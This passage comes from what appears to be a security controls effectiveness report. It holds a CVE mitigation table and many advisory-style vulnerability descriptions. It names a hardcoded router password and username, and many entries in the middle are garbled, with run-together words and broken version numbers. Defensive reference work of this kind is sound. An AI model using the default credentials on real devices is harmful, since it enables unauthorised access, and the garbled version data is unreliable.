| CVE-2014-6487 | n | n | y | n | n | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2014-7250 | n | y | y | n | n | Not Mitigated | Mitigated - Firewall, Patch Management |
| CVE-2014-7927 | y | y | y | y | n | Not Mitigated | Mitigated - Firewall, Secure Configuration (Access Control), Patch Management |
| CVE-2014-7945 | y | y | y | y | n | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2014-8447 | y | y | y | y | n | Not Mitigated | Partially Mitigated - Anti-Malware, Patch Management |
| CVE-2014-8638 | y | y | y | y | y | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-8835 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2014-9159 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Anti-Malware, Patch Management [Time Delay] |
| CVE-2014-9163 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Anti-Malware, Patch Management [Time Delay] |
| CVE-2014-9350 | y | y | y | y | n | Not Mitigated | Mitigated - Firewall, Anti-DoS, Firmware Updates |
| CVE-2014-9357 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Anti-Malware, Secure Configuration |
CVE Details

CVE-2013-0008
win32k.sys in the kernel-mode drivers in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT does not properly handle window broadcast messages, which allows local users to gain privileges via a crafted application, aka "Win32k Improper Message Handling Vulnerability."

CVE-2013-0022
Use-after-free vulnerability in Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer LsGetTrailInfo Use After Free Vulnerability."

CVE-2013-0084
Directory traversal vulnerability in Microsoft SharePoint Server 2010 SP1 and SharePoint Foundation 2010 SP1 allows remote attackers to bypass intended read restrictions for content, and hijack user accounts, via a crafted URL, aka "SharePoint Directory Traversal Vulnerability."

CVE-2013-0140
SQL injection vulnerability in the Agent-Handler component in McAfee ePolicy Orchestrator (ePO) before 4.5.7 and 4.6.x before 4.6.6 allows remote attackers to execute arbitrary SQL commands via a crafted request over the Agent-Server communication channel.

CVE-2013-0149
The OSPF implementation in Cisco IOS 12.0 through 12.4 and 15.0 through 15.3, IOS-XE 2.x through 3.9.xS, ASA and PIX 7.x through 9.1, FWSM, NX-OS, and StarOS before 14.0.50488 does not properly validate Link State Advertisement (LSA) type 1 packets before performing operations on the LSA database, which allows remote attackers to cause a denial of service (routing disruption) or obtain sensitive packet information via a (1) unicast or (2) multicast packet, aka Bug IDs CSCug34485, CSCug34469, CSCug39762, CSCug63304, and CSCug39795.

CVE-2013-0172
Samba 4.0.x before 4.0.1, in certain Active Directory domain-controller configurations, does not properly interpret Access Control Entries that are based on an objectClass, which allows remote authenticated users to bypass intended restrictions on modifying LDAP directory objects by leveraging (1) objectClass access by a user, (2) objectClass access by a group, or (3) write access to an attribute.

CVE-2013-0174
The external node classifier (ENC) API in Foreman before 1.1 allows remote attackers to obtain the hashed root password via an API request.

CVE-2013-0199
The default LDAP ACIs in FreeIPA 3.0 before 3.1.2 do not restrict access to the (1) ipaNTTrustAuthIncoming and (2) ipaNTTrustAuthOutgoing attributes, which allow remote attackers to obtain the Cross-Realm Kerberos Trust key via unspecified vectors.

CVE-2013-0253
The default configuration of Apache Maven 3.0.4, when using Maven Wagon 2.1, disables SSL certificate checks, which allows remote attackers to spoof servers via a man-in-the-middle (MITM) attack.

CVE-2013-0270
OpenStack Keystone Grizzly before 2013.1, Folsom, and possibly earlier allows remote attackers to cause a denial of service (CPU and memory consumption) via a large HTTP request, as demonstrated by a long tenant name when requesting a token.

CVE-2013-0481
The console in IBM Sterling B2B Integrator 5.1 and 5.2 and Sterling File Gateway 2.1 and 2.2 allows remote attackers to read stack traces by triggering (1) an error or (2) an exception.

CVE-2013-0598
Cross-site request forgery (CSRF) vulnerability in the Web Client in IBM Rational ClearQuest 7.1 before 7.1.2.12, 8.0 before 8.0.0.8, and 8.0.1 before 8.0.1.1 allows remote attackers to hijack the authentication of arbitrary users.

CVE-2013-0619
Adobe Reader and Acrobat 9.x before 9.5.3, 10.x before 10.1.5, and 11.x before 11.0.1 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2012-1530, CVE-2013-0601, CVE-2013-0605, CVE-2013-0616, CVE-2013-0620, and CVE-2013-0623.

CVE-2013-0633
Buffer overflow in Adobe Flash Player before 10.3.183.51 and 11.x before 11.5.502.149 on Windows and Mac OS X, before 10.3.183.51 and 11.x before 11.2.202.262 on Linux, before 11.1.111.32 on Android 2.x and 3.x, and before 11.1.115.37 on Android 4.x allows remote attackers to execute arbitrary code via crafted SWF content, as exploited in the wild in February 2013.

CVE-2013-0649
Use-after-free vulnerability in Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on Windows, before 10.3.183.61 and 11.x before 11.6.602.167 on Mac OS X, before 10.3.183.61 and 11.x before 11.2.202.270 on Linux, before 11.1.111.43 on Android 2.x and 3.x, and before 11.1.115.47 on Android 4.x; Adobe AIR before 3.6.0.597; and Adobe AIR SDK before 3.6.0.599 allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2013-0644 and CVE-2013-1374.

CVE-2013-0746
Mozilla Firefox before 18.0, Firefox ESR 10.x before 10.0.12 and 17.x before 17.0.2, Thunderbird before 17.0.2, Thunderbird ESR 10.x before 10.0.12 and 17.x before 17.0.2, and SeaMonkey before 2.15 do not properly implement quickstubs that use the jsval data type for their return values, which allows remote attackers to execute arbitrary code or cause a denial of service (compartment mismatch and application crash) via crafted JavaScript code that is not properly handled during garbage collection.

CVE-2013-0753
Use-after-free vulnerability in the serializeToStream implementation in the XMLSerializer component in Mozilla Firefox before 18.0, Firefox ESR 10.x before 10.0.12 and 17.x before 17.0.2, Thunderbird before 17.0.2, Thunderbird ESR 10.x before 10.0.12 and 17.x before 17.0.2, and SeaMonkey before 2.15 allows remote attackers to execute arbitrary code via crafted web content.

CVE-2013-0787
Use-after-free vulnerability in the nsEditor::IsPreformatted function in editor/libeditor/base/nsEditor.cpp in Mozilla Firefox before 19.0.2, Firefox ESR 17.x before 17.0.4, Thunderbird before 17.0.4, Thunderbird ESR 17.x before 17.0.4, and SeaMonkey before 2.16.1 allows remote attackers to execute arbitrary code via vectors involving an execCommand call.

CVE-2013-0909
The XSS Auditor in Google Chrome before 25.0.1364.152 allows remote attackers to obtain sensitive HTTP Referer information via unspecified vectors.

CVE-2013-1035
The iTunes ActiveX control in Apple iTunes before 11.1 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site.

CVE-2013-1102
The Wireless Intrusion Prevention System (wIPS) component on Cisco Wireless LAN Controller (WLC) devices with software 7.0 before 7.0.235.0, 7.1 and 7.2 before 7.2.110.0, and 7.3 before 7.3.101.0 allows remote attackers to cause a denial of service (device reload) via crafted IP packets, aka Bug ID CSCtx80743.

CVE-2013-1140
The XML parser in Cisco Security Monitoring, Analysis, and Response System (MARS) allows remote attackers to read arbitrary files via an external entity declaration in conjunction with an entity reference, related to an XML External Entity (XXE) issue, aka Bug ID CSCue55093.
CVE-2013-1144Memory leak in the IKEv1 implementationin Cisco IOS 151 allows x000D remoteattackers to cause a denial of service(memory consumption) via x000Dunspecified (1) IPv4 or (2) IPv6 IKEpackets aka Bug ID CSCth81055
CVE-2013-1153Cross-site request forgery (CSRF)vulnerability in the web interface x000Din Cisco Prime Infrastructure allowsremote attackers to hijack the x000Dauthentication of arbitrary users aka BugID CSCue84676
CVE-2013-1181Cisco NX-OS on Nexus 5500 devices4x and 5x before 50(3)N2(2) x000DNexus 3000 devices 5x before 50(3)U3(2)and Unified Computing x000D System(UCS) 6200 devices before 20(1w) allowsremote attackers to x000D cause a denialof service (device reload) by sending ajumbo packet to x000D the managementinterface aka Bug IDs CSCtx17544CSCts10593 and x000D CSCtx95389
CVE-2013-1303rdquoUse-after-free vulnerability in MicrosoftInternet Explorer 6 through x000D 10allows remote attackers to execute arbitrarycode via a crafted web x000D site thattriggers access to a deleted object akardquordquoInternet Explorer x000D Use After FreeVulnerabilityrdquordquo a different vulnerabilitythan x000D CVE-2013-1304 and CVE-2013-1338rdquo
CVE-2013-1384Adobe Shockwave Player before 1202122allows attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via unspecified vectors adifferent vulnerability than CVE-2013-1386
CVE-2013-1388Unspecified vulnerability in AdobeColdFusion 90 before Update 10 x000D901 before Update 9 902 before Update4 and 10 before Update 9 x000D allowsattackers to obtain administrator-consoleaccess via unknown x000D vectors
CVE-2013-1450Microsoft Internet Explorer 8 and 9 whenthe Proxy Settings x000D configurationhas the same Proxy address and Portvalues in the HTTP x000D and Securerows does not properly reuse TCPsessions to the proxy x000D server whichallows remote attackers to obtain sensitiveinformation x000D intended for a specifichost via a crafted HTML document thattriggers x000D many HTTPS requests andthen triggers an HTTP request to thathost as x000D demonstrated by reading aCookie header aka MSRC 12096gd
CVE-2013-1472Unspecified vulnerability in the JavaFXcomponent in Oracle Java SE x000DJavaFX 224 and earlier allows remoteattackers to affect x000D confidentialityintegrity and availability via unknownvectors a x000D different vulnerabilitythan other CVEs listed in the February2013 x000D CPU
CVE-2013-1553Unspecified vulnerability in the OracleWeb Services Manager component x000Din Oracle Fusion Middleware 111160allows remote attackers to x000D affect
confidentiality and integrity via unknownvectors related to x000D Web ServicesSecurity
CVE-2013-1620The TLS implementation in MozillaNetwork Security Services (NSS)does x000D not properly considertiming side-channel attacks on anoncompliant x000D MAC checkoperation during the processing ofmalformed CBC padding x000D whichallows remote attackers to conductdistinguishing attacks and x000D plaintext-recovery attacks via statistical analysis oftiming data for x000D crafted packets arelated issue to CVE-2013-0169
CVE-2013-1627Absolute path traversal vulnerability inNTWebServerexe in Indusoft x000DStudio 70 and earlier and AdvantechStudio 70 and earlier allows x000D remoteattackers to read arbitrary files via a fullpathname in an x000D argument to thesub 401A90 CreateFileW function
CVE-2013-1638Opera before 1213 allows remote attackersto execute arbitrary code x000D via craftedclipPaths in an SVG document
CVE-2013-1669Multiple unspecified vulnerabilities in thebrowser engine in Mozilla x000D Firefoxbefore 210 allow remote attackers tocause a denial of x000D service (memorycorruption and application crash) or possiblyexecute x000D arbitrary code via unknownvectors
CVE-2013-1676The SelectionIteratorGetNextSegmentfunction in Mozilla Firefox before210 Firefox ESR 17x before 1706Thunderbird before 1706 andThunderbird ESR 17x before 1706 allowsremote attackers to execute arbitrary codeor cause a denial of service (out-of-boundsread) via unspecified vectors
CVE-2013-1700The Mozilla Maintenance Service in MozillaFirefox before 220 on x000D Windowsdoes not properly handle inability to launchthe Mozilla x000D Updater executablefile which allows local users to gainprivileges x000D via vectors involvingplacement of a Trojan horse executable fileat x000D an arbitrary location
CVE-2013-1734Cross-site request forgery (CSRF)vulnerability in attachmentcgi in x000DBugzilla 2x 3x and 40x before 401141x and 42x before x000D 427and 43x and 44x before 441 allowsremote attackers to x000D hijack theauthentication of arbitrary users for requeststhat commit x000D an attachment changevia an update action
CVE-2013-1777The JMX Remoting functionality in ApacheGeronimo 3x before 301 as x000D usedin IBM WebSphere Application Server(WAS) Community Edition x000D 3003and other products does not properlyimplement the RMI x000D classloaderwhich allows remote attackers to executearbitrary code x000D by using the JMXconnector to send a crafted serializedobject
CVE-2013-2319FileMaker Pro before 12 and Pro Advancedbefore 12 does not verify x000D X509certificates from SSL servers whichallows man-in-the-middle x000D attackersto spoof servers and obtain sensitiveinformation via a x000D crafted certificate
CVE-2013-2340Unspecified vulnerability on the HPProCurve JCA JCBJDA JDB JEAJFA JFB JFCJGA 658250-B21 and 658247-B21HP 3COM routers and switches and HPH3C routers and switches allows remoteattackers to execute arbitrary code orobtain sensitive information via unknownvectors
CVE-2013-2350Unspecified vulnerability in HP StorageData Protector 62X allows x000D remoteattackers to execute arbitrary code or causea denial of x000D service via unknownvectors aka ZDI-CAN-1897
CVE-2013-2492Stack-based buffer overflow in Firebird213 through 215 before x000D 18514and 251 through 253 before 26623 onWindows allows remote x000D attackersto execute arbitrary code via a craftedpacket to TCP port x000D 3050 relatedto a missing size check during extractionof a group x000D number from CNCTinformation
CVE-2013-2507Multiple cross-site scripting (XSS)vulnerabilities in the Brother MFC-9970CDW printer with firmware G (103)allow remote attackers to inject arbitraryweb script or HTML via the (1) id parameterto adminlog to nethtml or (2) kindparameter to faxcopy settingshtml adifferent vulnerability than CVE-2013-2670and CVE-2013-2671
CVE-2013-2736Adobe Reader and Acrobat 9x before 95510x before 1017 and x000D 11x before11003 allow attackers to execute arbitrarycode or cause x000D a denial of service(memory corruption) via unspecified vectorsa x000D different vulnerability than CVE-2013-2718 CVE-2013-2719 x000D CVE-2013-2720 CVE-2013-2721 CVE-2013-2722 CVE-2013-2723 x000D CVE-2013-2725 CVE-2013-2726 CVE-2013-2731CVE-2013-2732 x000D CVE-2013-2734CVE-2013-2735 CVE-2013-3337 CVE-2013-3338 x000D CVE-2013-3339 CVE-2013-3340 and CVE-2013-3341
CVE-2013-2780Siemens SIMATIC S7-1200 PLCs 2x and3x allow remote attackers to x000D causea denial of service (defect-mode transitionand control outage) x000D via craftedpackets to UDP port 161 (aka the SNMPport)
CVE-2013-2803ProSoft RadioLinx ControlScape before600040 uses a deficient PRNG x000Dalgorithm and seeding strategy forpassphrases which makes it easier x000Dfor remote attackers to obtain access via abrute-force attack
CVE-2013-2824Schneider Electric StruxureWare SCADAExpert Vijeo Citect 740 Vijeo x000D
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 20 of 28
Citect 720 through 730SP1 CitectSCADA720 through 730SP1 x000DStruxureWare PowerSCADA Expert 730through 730SR1 and PowerLogic x000DSCADA 720 through 720SR1 do notproperly handle exceptions which x000Dallows remote attackers to cause a denialof service via a crafted x000D packet
CVE-2013-2826: WellinTech KingSCADA before 3.1.2, KingAlarm&Event before 3.1, and KingGraphic before 3.1.2 perform authentication on the KAEClientManager console rather than on the server, which allows remote attackers to bypass intended access restrictions and discover credentials via a crafted packet to TCP port 8130.
CVE-2013-2920: The DoResolveRelativeHost function in url/url_canon_relative.cc in Google Chrome before 30.0.1599.66 allows remote attackers to cause a denial of service (out-of-bounds read) via a relative URL containing a hostname, as demonstrated by a protocol-relative URL beginning with a //www.google.com substring.
CVE-2013-3064: Open redirect vulnerability in ui/dynamic/unsecured.html in Linksys EA6500 with firmware 1.1.28.147876 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the target parameter.
CVE-2013-3116: Microsoft Internet Explorer 7 through 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."
CVE-2013-3137: Microsoft FrontPage 2003 SP3 does not properly parse DTDs, which allows remote attackers to obtain sensitive information via crafted XML data in a FrontPage document, aka "XML Disclosure Vulnerability."
CVE-2013-3194: Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."
CVE-2013-3199: Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."
CVE-2013-3201: Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3203, CVE-2013-3206, CVE-2013-3207, and CVE-2013-3209.
CVE-2013-3206: Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3201, CVE-2013-3203, CVE-2013-3207, and CVE-2013-3209.
CVE-2013-3280: EMC RSA Authentication Agent 7.1.x before 7.1.2 for Web for Internet Information Services has a fail-open design, which allows remote attackers to bypass intended access restrictions via vectors that trigger an agent crash.
CVE-2013-3387: Cisco Prime Central for Hosted Collaboration Solution (HCS) Assurance 8.6 and 9.x before 9.2(1) allows remote attackers to cause a denial of service (disk consumption) via a flood of TCP packets to port 5400, leading to large error-log files, aka Bug ID CSCua42724.
CVE-2013-3417: The administrative web interface in Cisco Video Surveillance Operations Manager does not properly perform authentication, which allows remote attackers to watch video feeds via a crafted URL, aka Bug ID CSCtg72262.
CVE-2013-3632: The Cron service in rpc.php in OpenMediaVault allows remote authenticated users to execute cron jobs as arbitrary users and execute arbitrary commands via the username parameter.
CVE-2013-3656: Cybozu Office 9.1.0 and earlier does not properly manage sessions, which allows remote attackers to bypass authentication by leveraging knowledge of a login URL.
CVE-2013-3856: Microsoft Word 2003 SP3 and Word Viewer allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted Office document, aka "Word Memory Corruption Vulnerability."
CVE-2013-3860: Microsoft .NET Framework 2.0 SP2, 3.5, 3.5 SP1, 3.5.1, 4, and 4.5 does not properly parse a DTD during XML digital-signature validation, which allows remote attackers to cause a denial of service (application crash or hang) via a crafted signed XML document, aka "Entity Expansion Vulnerability."
CVE-2013-3893: Use-after-free vulnerability in the SetMouseCapture implementation in mshtml.dll in Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code via crafted JavaScript strings, as demonstrated by use of an ms-help: URL that triggers loading of hxds.dll.
CVE-2013-3897: Use-after-free vulnerability in the CDisplayPointer class in mshtml.dll in Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted JavaScript code that uses the onpropertychange event handler, as exploited in the wild in September and October 2013, aka "Internet Explorer Memory Corruption Vulnerability."
CVE-2013-3900: The WinVerifyTrust function in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 does not properly validate PE file digests during Authenticode signature verification, which allows remote attackers to execute arbitrary code via a crafted PE file, aka "WinVerifyTrust Signature Validation Vulnerability."
CVE-2013-3905: Microsoft Outlook 2007 SP3, 2010 SP1 and SP2, 2013, and 2013 RT does not properly expand metadata contained in S/MIME certificates, which allows remote attackers to obtain sensitive network configuration and state information via a crafted certificate in an e-mail message, aka "S/MIME AIA Vulnerability."
CVE-2013-4223: The Gentoo Nullmailer package before 1.11-r2 uses world-readable permissions for /etc/nullmailer/remotes, which allows local users to obtain SMTP authentication credentials by reading the file.
CVE-2013-4436: The default configuration for salt-ssh in Salt (aka SaltStack) 0.17.0 does not validate the SSH host key of requests, which allows remote attackers to have unspecified impact via a man-in-the-middle (MITM) attack.
CVE-2013-4478: Sup before 0.13.2.1 and 0.14.x before 0.14.1.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the filename of an email attachment.
CVE-2013-4529: Buffer overflow in hw/pci/pcie_aer.c in QEMU before 1.7.2 allows remote attackers to cause a denial of service and possibly execute arbitrary code via a large log_num value in a savevm image.
CVE-2013-4555: Cross-site request forgery (CSRF) vulnerability in ecrire/action/logout.php in SPIP before 2.1.24 allows remote attackers to hijack the authentication of arbitrary users for requests that logout the user via unspecified vectors.
CVE-2013-4776: NETGEAR ProSafe GS724Tv3 and GS716Tv2 with firmware 5.4.1.13 and earlier, GS748Tv4 5.4.1.14, and GS510TP 5.0.4.4 allows remote attackers to cause a denial of service (reboot or crash) via a crafted HTTP request to filesystem.
CVE-2013-4782: The Supermicro BMC implementation allows remote attackers to bypass authentication and execute arbitrary IPMI commands by using cipher suite 0 (aka cipher zero) and an arbitrary password.
CVE-2013-5057: hxds.dll in Microsoft Office 2007 SP3 and 2010 SP1 and SP2 does not implement the ASLR protection mechanism, which makes it easier for remote attackers to execute arbitrary code via a crafted COM component on a web site that is visited with Internet Explorer, as exploited in the wild in December 2013, aka "HXDS ASLR Vulnerability."
CVE-2013-5369: IBM SPSS Analytical Decision Management 6.1 before IF1, 6.2 before IF1, and 7.0 before FP1 IF6 might allow remote attackers to execute arbitrary code by deploying and accessing a service.
CVE-2013-5428: IBM WebSphere DataPower XC10 appliances 2.5.0 do not require authentication for all administrative actions, which allows remote attackers to cause a denial of service via unspecified vectors.
CVE-2013-5431: Open redirect vulnerability in IBM Tivoli Federated Identity Manager (TFIM) 6.1.1 before IF 15, 6.2.0 before IF 14, 6.2.1, and 6.2.2 before IF 8 and Tivoli Federated Identity Manager Business Gateway (TFIMBG) 6.1.1 before IF 15, 6.2.0 before IF 14, 6.2.1, and 6.2.2 before IF 8 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.
CVE-2013-5494: Cross-site request forgery (CSRF) vulnerability in the web framework in Cisco Unified MeetingPlace Solution, as used in Unified MeetingPlace Web Conferencing and Unified MeetingPlace, allows remote attackers to hijack the authentication of arbitrary users, aka Bug IDs CSCui45209 and CSCui44674.
CVE-2013-5507: The IPsec implementation in Cisco Adaptive Security Appliance (ASA) Software 9.1 before 9.1(1.7), when an IPsec VPN tunnel is enabled, allows remote attackers to cause a denial of service (device reload) via a (1) ICMP or (2) ICMPv6 packet that is improperly handled during decryption, aka Bug ID CSCue18975.
CVE-2013-5536: Cisco Secure Access Control System (ACS) does not properly implement an incoming-packet firewall rule, which allows remote attackers to cause a denial of service (process crash) via a flood of crafted packets, aka Bug ID CSCui51521.
CVE-2013-5559: Buffer overflow in the Active Template Library (ATL) framework in the VPNAPI COM module in Cisco AnyConnect Secure Mobility Client 2.x allows user-assisted remote attackers to execute arbitrary code via a crafted HTML document, aka Bug ID CSCuj58139.
CVE-2013-5561: The Safe Search enforcement feature in Cisco Adaptive Security Appliance (ASA) CX Context-Aware Security Software does not properly perform filtering, which allows remote attackers to bypass intended policy restrictions via unspecified vectors, aka Bug ID CSCui94622.
CVE-2013-5751: Directory traversal vulnerability in SAP NetWeaver 7.x allows remote attackers to read arbitrary files via unspecified vectors.
CVE-2013-5757: Absolute path traversal vulnerability in Yealink VoIP Phone SIP-T38G allows remote authenticated users to read arbitrary files via a full pathname in the dumpConfigFile function in the command parameter to cgi-bin/cgiServer.exx.
CVE-2013-5828: Unspecified vulnerability in the Enterprise Manager Base Platform component in Oracle Enterprise Manager Grid Control EM Base Platform 10.2.0.5 and 11.1.0.1, EM DB Control 11.1.0.7, 11.2.0.2, and 11.2.0.3, and EM Plugin for DB 12.1.0.2 and 12.1.0.3 allows remote attackers to affect integrity via unknown vectors related to Storage Management.
CVE-2013-6167: Mozilla Firefox through 27 sends HTTP Cookie headers without first validating that they have the required character-set restrictions, which allows remote attackers to conduct the equivalent of a persistent Logout CSRF attack via a crafted parameter that forces a web application to set a malformed cookie within an HTTP response.
CVE-2013-6188: Cross-site request forgery (CSRF) vulnerability in HP System Management Homepage (SMH) 7.1 through 7.2.2 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.
CVE-2013-6284: Unspecified vulnerability in the Statutory Reporting for Insurance (FS SR) component in the Financial Services module for SAP ERP Central Component (ECC) allows attackers to execute arbitrary code via unspecified vectors, related to a "code injection vulnerability."
CVE-2013-6396: The OpenStack Python client library for Swift (python-swiftclient) 1.0 through 1.9.0 does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.
CVE-2013-6475: Multiple integer overflows in (1) OPVPOutputDev.cxx and (2) oprs/OPVPSplash.cxx in the pdftoopvp filter in CUPS and cups-filters before 1.0.47 allow remote attackers to execute arbitrary code via a crafted PDF file, which triggers a heap-based buffer overflow.
CVE-2013-6660: The drag-and-drop implementation in Google Chrome before 33.0.1750.117 does not properly restrict the information in WebDropData data structures, which allows remote attackers to discover full pathnames via a crafted web site.
CVE-2013-6699: The Control and Provisioning of Wireless Access Points (CAPWAP) protocol implementation on Cisco Wireless LAN Controller (WLC) devices allows remote attackers to cause a denial of service via a crafted CAPWAP packet that triggers a buffer over-read, aka Bug ID CSCuh81880.
CVE-2013-6702: The management implementation on Cisco ONS 15454 controller cards with software 9.8 and earlier allows remote attackers to cause a denial of service (card reset) via crafted packets, aka Bug ID CSCtz50902.
CVE-2013-6979: The VTY authentication implementation in Cisco IOS XE 03.02.xx.SE and 03.03.xx.SE incorrectly relies on the Linux-IOS internal-network configuration, which allows remote attackers to bypass authentication by leveraging access to a 192.168.x.2 source IP address, aka Bug ID CSCuj90227.
CVE-2013-6994: OpenText Exceed OnDemand (EoD) 8 transmits the session ID in cleartext, which allows remote attackers to perform session fixation attacks by sniffing the network.
CVE-2013-7004: D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 have a hardcoded account of username gkJ9232xXyruTRmY, which makes it easier for remote attackers to obtain access by leveraging knowledge of the username.
CVE-2013-7043: Multiple cross-site request forgery (CSRF) vulnerabilities on Cisco Scientific Atlanta DPR2320R2 routers with software 2.0.2r1262-090417 allow remote attackers to hijack the authentication of administrators for requests that (1) change a password via the Password parameter to goform/RgSecurity, (2) reboot the device via the Restart parameter to goform/restart, (3) modify Wi-Fi settings, as demonstrated by the WpaPreSharedKey parameter to goform/wlanSecurity, or (4) modify parental controls via the ParentalPassword parameter to goform/RgParentalBasic.
CVE-2013-7389: Multiple cross-site scripting (XSS) vulnerabilities in D-Link DIR-645 Router (Rev. A1) with firmware before 1.04B11 allow remote attackers to inject arbitrary web script or HTML via the (1) deviceid parameter to parentalcontrols/bind.php, (2) RESULT parameter to info.php, or (3) receiver parameter to bsc_sms_send.php.
CVE-2014-0001: Buffer overflow in client/mysql.cc in Oracle MySQL and MariaDB before 5.5.35 allows remote database servers to cause a denial of service (crash) and possibly execute arbitrary code via a long server version string.
CVE-2014-0035: The SymmetricBinding in Apache CXF before 2.6.13 and 2.7.x before 2.7.10, when EncryptBeforeSigning is enabled and the UsernameToken policy is set to an EncryptedSupportingToken, transmits the UsernameToken in cleartext, which allows remote attackers to obtain sensitive information by sniffing the network.
CVE-2014-0160: The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.
CVE-2014-0207: The cdf_read_short_sector function in cdf.c in file before 5.19, as used in the Fileinfo component in PHP before 5.4.30 and 5.5.x before 5.5.14, allows remote attackers to cause a denial of service (assertion failure and application exit) via a crafted CDF file.
CVE-2014-0259: Microsoft Word 2007 SP3 and Office Compatibility Pack SP3 allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted Office document, aka "Word Memory Corruption Vulnerability."
CVE-2014-0266: The XMLHTTP ActiveX controls in XML Core Services 3.0 in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allow remote attackers to bypass the Same Origin Policy via a web page that is visited in Internet Explorer, aka "MSXML Information Disclosure Vulnerability."
CVE-2014-0294: Microsoft Forefront Protection 2010 for Exchange Server does not properly parse e-mail content, which might allow remote attackers to execute arbitrary code via a crafted message, aka "RCE Vulnerability."
CVE-2014-0313: Microsoft Internet Explorer 10 and 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-0321.
CVE-2014-0354: The ZyXEL Wireless N300 NetUSB NBG-419N router with firmware 1.00(BFQ.6)C0 has a hardcoded password of qweasdzxc for an unspecified account, which allows remote attackers to obtain index.asp login access via an HTTP request.
CVE-2014-0362: Cross-site scripting (XSS) vulnerability on Google Search Appliance (GSA) devices before 7.0.14.G.216 and 7.2 before 7.2.0.G.114, when dynamic navigation is configured, allows remote attackers to inject arbitrary web script or HTML via input included in a SCRIPT element.
CVE-2014-0433: Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.6.13 and earlier allows remote attackers to affect availability via unknown vectors related to Thread Pooling.
CVE-2014-0488: APT before 1.0.9 does not "invalidate repository data" when moving from an unauthenticated to authenticated state, which allows remote attackers to have unspecified impact via crafted repository data.
CVE-2014-0493: Adobe Reader and Acrobat 10.x before 10.1.9 and 11.x before 11.0.06 on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2014-0495.
CVE-2014-0494: Adobe Digital Editions 2.0.1 allows attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via unspecified vectors.
CVE-2014-0498: Stack-based buffer overflow in Adobe Flash Player before 11.7.700.269 and 11.8.x through 12.0.x before 12.0.0.70 on Windows and Mac OS X and before 11.2.202.341 on Linux, Adobe AIR before 4.0.0.1628 on Android, Adobe AIR SDK before 4.0.0.1628, and Adobe AIR SDK & Compiler before 4.0.0.1628 allows attackers to execute arbitrary code via unspecified vectors.
CVE-2014-0515: Buffer overflow in Adobe Flash Player before 11.7.700.279 and 11.8.x through 13.0.x before 13.0.0.206 on Windows and OS X, and before 11.2.202.356 on Linux, allows remote attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in April 2014.
